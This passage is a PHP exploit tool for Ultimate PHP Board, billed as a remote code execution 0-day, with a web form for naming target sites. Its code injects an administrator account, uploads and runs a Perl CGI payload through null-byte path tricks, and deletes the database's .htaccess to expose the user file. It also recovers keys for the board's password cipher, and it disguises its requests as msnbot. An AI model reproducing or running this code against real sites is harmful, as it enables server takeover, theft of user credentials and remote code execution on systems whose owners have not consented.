"; $i_key = ord(substr($key, $i, 1)); // print $i."ikey:".$i_key."
"; $i_text = ord(substr($text, $i, 1)); // print $i."itext:".$i_text."
"; $n_key = ord(substr($key, $i+1, 1)); // print $i."nkey:".$n_key."
"; $i_crypt = $i_text + $i_key; // print $i."T+K_crypt:".$i_crypt ."
"; $i_crypt = $i_crypt - $n_key; // print $i."I-N_crypt:".$i_crypt."
"; $crypt .= chr($i_crypt); $offset0=$i_crypt-$i_text; // print "key=$i_key - $n_key
"; // print "offset0:$offset0=$i_crypt-$i_text
"; $offset=$i_key-$n_key; //print "offset:$offset
"; // $broken=$i_text+$offset; // print "broken:".$broken; } return $crypt; } function gen_collision($offset, $start){//$start should be a number of an ascii char $offset_len=strlen($offset); $x=0; // print "len:".$offset_len."
"; // for($x=0;$x<$offset_len;$x++){//$offset as $off_int){ foreach($offset as $off_char){ if($x==0){ $newkey.=chr($start); $nextchar=$start; $x++; } // print "next char: $nextchar "."offset:".$off_char."
"; $tmp=$nextchar - $off_char; $newkey.=chr($tmp); $nextchar=$tmp; } return $newkey; } function gen_offset($crypt,$text){ $text_len=strlen($text); for($x=0;$x<$text_len;$x++){ // print "crypt:".substr($crypt, $x, 1).'text:'.substr($text, $x, 1).'
'; $cry_hex=ord(substr($crypt, $x, 1)); $txt_hex=ord(substr($text, $x, 1)); $offset[$x]=$cry_hex - $txt_hex; //print "offset".$offset."crypt".$cry_hex."text".$txt_hex[x]."
"; } return $offset;//numeric array } function http_gpc_send( $method, $host, $port ,$usepath,$cookie="", $postdata = "") { $fp = pfsockopen( $host, $port, &$errno, &$errstr, 120 ); # user-agent name $ua = "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"; if( !$fp ) { print "$errstr ($errno)
\nn"; } else { if( $method == "GET" ) { fputs( $fp, "GET $usepath HTTP/1.0\n" ); } else if( $method == "POST" ) { fputs( $fp, "POST $usepath HTTP/1.0\n" ); } fputs( $fp, "User-Agent: ".$ua."\n" ); fputs($fp, "Host: ".$host."\n"); fputs( $fp, "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" ); fputs( $fp, "Accept-Language: en-us,en;q=0.5\n" ); fputs( $fp, "Accept-Encoding: gzip,deflate\n" ); fputs( $fp, "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" ); fputs( $fp, "Cookie: ".$cookie."\n" ); if( $method == "POST" ) { $strlength = strlen( $postdata ); fputs( $fp, "Content-type: application/x-www-form-urlencoded\n" ); fputs( $fp, "Content-length: ".$strlength."\n\n" ); fputs( $fp, $postdata."\n\n"); } fputs( $fp, "\n\n" ); $output = ""; while( !feof( $fp ) ) { $output .= fgets( $fp, 1024 ); } fclose( $fp ); } return $output; } function getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env){ $exp_power_env="3";//admin $InjectUserPost="u_login=te".rand()."1&u_email=rew".rand()."@wfje.com&u_loca=&u_site=&avatar=images%2Favatars%2Fnoavatar.gif&u_icq=&u_aim=&u_msn=&u_sig=s%3C%7E%3E0%3C%7E%3E2006-04-20%5BNR%5D".$exp_user_env."%3C%7E%3E".$exp_pass_env."%3C%7E%3E".$exp_power_env."%3C%7E%3EA%40a.com%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E1%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E13%3C%7E%3E%3C%7E%3E1%3C%7E%3E".$exp_id_env."&submit=Submit"; http_gpc_send("POST", $victHost, $victPort, $victPath."/register.php", "", $InjectUserPost); } if(isset($_REQUEST['vict'])){ $payName="data".rand().".cgi";//must be .cgi $expPost="u_name=Admin&subject=hey&icon=#!/usr/bin/perl -wT \"&message=$perlPayload&id=/../images/$payName%00"; $exp_user_env="Jockie227"; $exp_pass_env="tZbi}"; $exp_power_env="3"; $exp_id_env=4000000000+rand(0,300000000); //The script is injecting user into the database; becase of this the cookie is known before the script even contacts the vulnerable "Ultamate PHP Boar". Also note that a time stamp is not needed. $cookie="user_env=$exp_user_env; pass_env=$exp_pass_env; power_env=$exp_power_env; id_env=$exp_id_env"; $url_parsed = parse_url($_REQUEST['vict']); if ( empty($url_parsed['scheme']) ) { $url_parsed = parse_url('http://'.$url); } $rtn['url'] = $url_parsed; $victPort = $url_parsed["port"]; if ( !$port ) { $victPort = 80; } $victPath = $url_parsed["path"]; $victHost = $url_parsed["host"]; print " Ultamate PHP Board Remote Code EXEC 0-Day "; print "
0-day
"; //injecting user into database, this information is used to verify session information getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env); //http_gpc_send("POST", $victHost, $victPort, $victPath."/register.php", "", $InjectUserPost); // http_gpc_send("GET", $victHost, $victPort, $victPath."/open.php?id=../images%00", $cookie); //uploading CGI $field=http_gpc_send("POST", $victHost, $victPort, $victPath."/newpost.php?a=1&t=1&page=1", $cookie, $expPost); //making cgi executeable usei "close.php" http_gpc_send("GET", $victHost, $victPort, $victPath."/close.php?id=../images/".$payName."%00", $cookie); //executing cgi $feedBack=http_gpc_send("GET",$victHost, $victPort, $victPath."/images/".$payName); $field = str_replace("<", "<", $field); $field = str_replace(">", ">", $field); // print $field; print $feedBack; exit; }elseif(isset($_REQUEST['victHTA'])){ $expPost="u_name=#&message=#&id=/.htaccess%00"; $exp_user_env="Jockie227"; $exp_pass_env="tZbi}"; $exp_power_env="3"; $exp_id_env=4000000000+rand(0,300000000); //The script is injecting user into the database; becase of this the cookie is known before the script even contacts the vulnerable Ultamate PHP Board. Also note that a time stamp is not needed. $cookie="user_env=$exp_user_env; pass_env=$exp_pass_env; power_env=$exp_power_env; id_env=$exp_id_env"; $url_parsed = parse_url($_REQUEST['victHTA']); if ( empty($url_parsed['scheme']) ) { $url_parsed = parse_url('http://'.$url); } $rtn['url'] = $url_parsed; $victPort = $url_parsed["port"]; if ( !$port ) { $victPort = 80; } $victPath = $url_parsed["path"]; $victHost = $url_parsed["host"]; //injecting user into database, this information is used to verify session information getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env); // $field=http_gpc_send("POST", $victHost, $victPort, $victPath."/newpost.php?a=1&t=1&page=1", $cookie, $expPost); // $field = str_replace("<", "<", $field); // $field = str_replace(">", ">", $field); // print $field; print "" ; exit; }else if(isset($_REQUEST['addVict'])){ $url_parsed = parse_url($_REQUEST['addVict']); if ( empty($url_parsed['scheme']) ) { $url_parsed = parse_url('http://'.$url); } $rtn['url'] = $url_parsed; $victPort = $url_parsed["port"]; if ( !$port ) { $victPort = 80; } $victPath = $url_parsed["path"]; $victHost = $url_parsed["host"]; $exp_user_env=$_REQUEST["addName"]; $exp_pass_env=t_encrypt($_REQUEST["addPass"],$v1_xKey); getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,4000000000+rand(0,300000000)); print " Ultamate PHP Board Remote Code EXEC 0-Day "; print "
Admin login Name:".$_REQUEST["addName"]."
";//this exploit code suffers from xss! print "
Admin login Password:".$_REQUEST["addPass"]."
"; exit; }else if(isset($_REQUEST['decrypt'])){ print "ecrypted password:"; print "
".$_REQUEST["decrypt"]."
"; print "Decrypted password:"; print "
".t_decrypt($_REQUEST["decrypt"],$v1_xKey)."
"; exit; }else if(isset($_REQUEST['encrypt'])){ print "ecrypted password:"; print "
".$_REQUEST["encrypt"]."
"; print "Decrypted password:"; print "
".t_encrypt($_REQUEST["encrypt"],$v1_xKey)."
"; // print get_key(t_encrypt($_REQUEST["encrypt"],$v1_xKey),$_REQUEST["encrypt"]); exit; }else if(isset($_REQUEST['cypher'])&&isset($_REQUEST['plain'])){ $cypher_len=strlen($_REQUEST['cypher']); $offset=gen_offset($_REQUEST['cypher'],$_REQUEST['plain']); print "Offset:"; for($x=0;$x<$cypher_len;$x++){ print $offset[$x].':'; } print '
'; $validKeys=0; $y=0; for($y=255;$y>=0;$y--){ $newKey[$y]=gen_collision($offset,$y); $key_len=strlen($newKey[$y]); print "
Key:$y = "; for($x=0;$x<=$key_len;$x++){ print $newKey[$y][$x]; } print "
Cypher:".t_encrypt($_REQUEST['plain'],$newKey[$y]); print "
Plain :".t_decrypt($_REQUEST['cypher'],$newKey[$y])."

"; } exit; } print " Ultimate PHP Board Remote Code EXEC 0-Day
0-day
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Get Admin
Inject an administrative account into UPB:

Path to attack:(example: http://www.domain.ext/PathToUPB)

Inject Name:

Inject Password:

PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values ( double quotes \" are only used in exploit)

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Gain Read Access To The Database

Removes /db/.htaccess to allow access to the remote target's flat file database:(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat)


------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Crypto

Plain Text Password:

Encrypted Password:

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Plain Text:

corosponding cypher text:

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection

perl CGI Code Injection Attack Remote Target:

http://www.domain.ext/PathToUPB (no trailing slash) "; ?>